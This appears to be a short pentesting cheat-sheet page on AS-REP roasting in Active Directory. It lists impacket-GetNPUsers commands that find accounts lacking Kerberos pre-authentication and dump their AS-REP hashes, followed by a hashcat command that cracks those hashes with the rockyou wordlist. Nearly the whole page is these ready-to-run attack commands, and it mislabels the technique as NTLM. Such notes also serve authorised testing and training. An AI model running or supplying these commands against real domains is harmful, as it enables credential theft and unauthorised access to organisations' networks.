Locate As-Rep Roastable Users (NTLM)
impacket-GetNPUsers $ADDOMAIN/$ADUSER -dc-ip $ADCONTROLLER
Collect As-Rep Tickets
impacket-GetNPUsers $ADDOMAIN/$ADUSER -dc-ip $ADCONTROLLER -format hashcat -outputfile asrep.hash
Crack Ticket
hashcat -m 18200 -a 0 asrep.hash /usr/share/wordlists/rockyou.txt
Last updated 10 months ago